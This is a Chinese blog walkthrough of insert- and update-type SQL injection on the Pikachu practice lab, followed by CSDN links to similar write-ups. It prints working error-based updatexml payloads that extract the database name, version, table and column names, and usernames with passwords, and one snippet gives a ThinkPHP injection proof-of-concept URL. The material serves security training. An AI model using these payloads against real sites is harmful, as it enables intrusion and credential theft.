pikachu 漏洞平台sql注入 之 insert/update注入

最新推荐文章于 2024-05-17 17:16:04 发布
最新推荐文章于 2024-05-17 17:16:04 发布
阅读量1.1k 收藏 5
点赞数
分类专栏: pkachu 解题 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118248493
版权

一般来说我们判断注入点的时候 如果是注册的地方应该是insert类型的,因为注册相当于往表里插一行新数据。
在这里插入图片描述
我们先来注册个账号 然后burp 抓个包分析一下
在这里插入图片描述
我们看到这里是有六个参数分别对应了 用户 密码 性别 手机 地址 住址
我们看到他提交的方式为post
我们还是首先来判断一下是否存在注入 和闭合的方式
先在第一个参数上加一个 ’ 试一下看看
在这里插入图片描述
爆出了数据库错误 我们可以判断是存在注入的
然后我们们看到参数中 第二个参数 ’ 可以闭合
注册页面是没有sql结果回显的,而且毕竟也不是select语句,也不能采取联合查询注入了。
不过从上一步的操作可以看出来,注册的时候如果sql语句有问题是会报错的,因此报错注入行得通。
构造一下我们的payload
username=xixi’ or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit
在这里插入图片描述
payload中的database()换成user(),可以获得当前登录数据库的用户和host
在这里插入图片描述

把user换成version 可以产看mysql 的版本
在这里插入图片描述
接下一如既往爆表
or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or ’
这里用 or 前后连接起来 让他执行咱们构造的语句
在这里插入图片描述
爆出 表接着往上怼
’ or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1) or
在这里插入图片描述
接着还是用构造的语句往函数里面怼就是了
update注入
update 操作应该是在修改个人信息的页面操作应该是在修改个人信息的页面
只有性别,手机,住址,邮箱全都有值的时候,才会执行修改用户信息的操作,否则该操作不执行

第一步肯定还是先判断注入点 找闭合 上个引号先
在这里插入图片描述

得到信息 单引号 上一波
在这里插入图片描述
看到报错信息 应该单引号就可以闭合了 接着用报错注入法 构造payload
v’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
在这里插入图片描述
爆出了pikachu 的库
1’ and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) #
在这里插入图片描述
1’ and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1) #
爆出表 users
在这里插入图片描述接着爆出user 里的字段
1’ and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1)
在这里插入图片描述
接着爆里面的数据
1’ and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,’^’,password)) from users),1,31),0x7e),1) #
在这里插入图片描述
总结
一般在注册还有后台修改信息的地方多多尝试用报错的方式注入 会有意想不到的结果

安全界 的彭于晏
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu注入insert注入
2201_75756681的博客
03-29 481
漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。我们爆出来数据库名后就是要开始爆表名了列名同理,但是提醒一点就是列名可能有多个加group_concat参数结果可能会被截断所以要加上limit。在网上经过查找资料发现insert注入几乎写的不全,自己复制后发现注入语句错误,使得自己还要更改,现在更新一篇insert注入的过程。最后开始爆数据爆username的数据。第三步就是开始我们的注入 了。
pikachu靶场(sql注入 insert/update
weixin_54431413的博客
03-14 4431
pikachu里的update/insert注入 2.对红色圈圈里所提交的参数进行注入 3.常用函数符号 (1)0x7e表示 ~符号 (2)database()显示出数据库名字 (3)version()显示出版本号 (4)user()显示出用户名 ...
3、insert/update注入
最新发布
weixin_51520483的博客
05-17 632
1、猜测源码中的语句,形成闭合2、注意闭合,不一定是单号,也有可能双引号3、区分用and还是用or。
SQL注入——insert注入pikachu)
W小哥
01-14 3807
第一步:访问目标网站,点击注册 第二步:填写注册内容并使用burpsuite抓取数据包,右键send toRepeater 第三步:数据包不修改,正常发送,返回内容如下所示 第四步:测试注入点 数据包中注册用户username修改,返回页面如下所示 第五步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,concat(0...
Pikachu的”insert/update注入
weixin_50339082的博客
06-15 2311
Pikachu的”insert/update注入 一、相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。 #所有三个参数都应为字符串。 E
Pikachu SQL注入insert/update注入
SS_liang的博客
01-11 1737
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
sql注入之数字型注入
08-02
sqlmap 是一种自动化的 SQL 注入工具,可以自动检测和利用 SQL 注入漏洞。使用 sqlmap 可以自动获取数据库名、表名、列名和用户数据。 例如,使用 sqlmap 获取 pikachu 数据库的信息: python2 sqlmap.py -u ...
pikachu漏洞练习环境
10-25
"pikachu漏洞练习环境" 是一个专门为网络安全爱好者和专业人士设计的平台,旨在提供一个实践和学习漏洞利用技术的环境。这个环境可以帮助用户提升在网络安全领域的技能,了解常见漏洞的原理,以及如何检测和修复它们...
8. insertupdate注入1
08-03
insertupdate注入1"描述的是一种SQL注入攻击的实例,它涉及到通过输入恶意的SQL代码来获取或篡改数据库中的信息。下面将详细解释这种攻击的各个步骤和涉及的知识点。 1. **注入获取数据库**: 攻击者尝试通过在...
SQL注入——update注入pikachu)
W小哥
01-15 3225
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
[Pikachu靶场实战系列] SQL注入insert/update注入
00勇士王子的博客
07-28 3553
insert注入 发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据 填写注册信息,然后抓个包,可以看到时post形式传输的数据 尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合 添加其他参数和)构建闭合 username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)# 构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,
Pikachu 漏洞练习平台insert/updata”注入
GitHub_3的博客
04-03 277
Pikachu 漏洞练习平台insert/updata”注入 源代码 $html=''; if(isset($_POST['submit'])){ if($_POST['username']!=null &&$_POST['password']!=null){ // $getdata=escape($link, $_POST);//转义 //没转义,导致注入漏洞,操作类型为insert $getdata=$_POST;
一文了解pikachuSQL注入
allintao的博客
03-01 2670
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
【信息安全】pikachu-SQL注入
Nicky_Zheng的博客
09-02 355
数字型注入 使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求 使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求 说明该处存在SQL注入 接下来需要使用order by 判断列数 oder by 2返回结果正常,说明只有2列 确认列数后,可使用union select获取数据库名、用户名 1 union select database(),user()# 通过information_schema获取当前数据库表名 根据表名
pikachu~~~insert/update/delete,http头注入
weixin_50339832的博客
05-30 740
@[TOC] select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu' select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users' select username,password from users# UPDATEXML (XML_document, XPa.
10-PHP代码审计——thinkphp3.2.3 update注入漏洞
网络安全
05-06 873
实验环境的poc: http://www.tptest.com/index.php/home/index/index?username[0]=bind&username[1]=0%20and%201=(updatexml(1,concat(0x3a,(user())),1))%23&password=123456 通过更改用户密码的案例来分析update注入漏洞的过程: 在分析之前,先梳理一下漏洞利用的过程,update注入的流程是:M函数 --> where函...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2570
Pikachu-----Sql Inject(SQL注入
pikachu靶场insert/update注入
10-21
pikachu靶场是一个专门用于测试SQL注入漏洞的靶场,其中包括了insert/update注入。在pikachu靶场中,insert/update注入漏洞通常出现在用户注册、登录、修改个人信息等功能中。攻击者可以通过构造恶意的SQL语句,将恶意代码注入到数据库中,从而实现对数据库的非法操作,比如获取敏感信息、篡改数据等。在pikachu靶场中,可以通过构造类似于引用中的payload来进行insert/update注入漏洞的测试。需要注意的是,在进行SQL注入测试时,一定要遵循合法、合规的测试流程,避免对目标系统造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值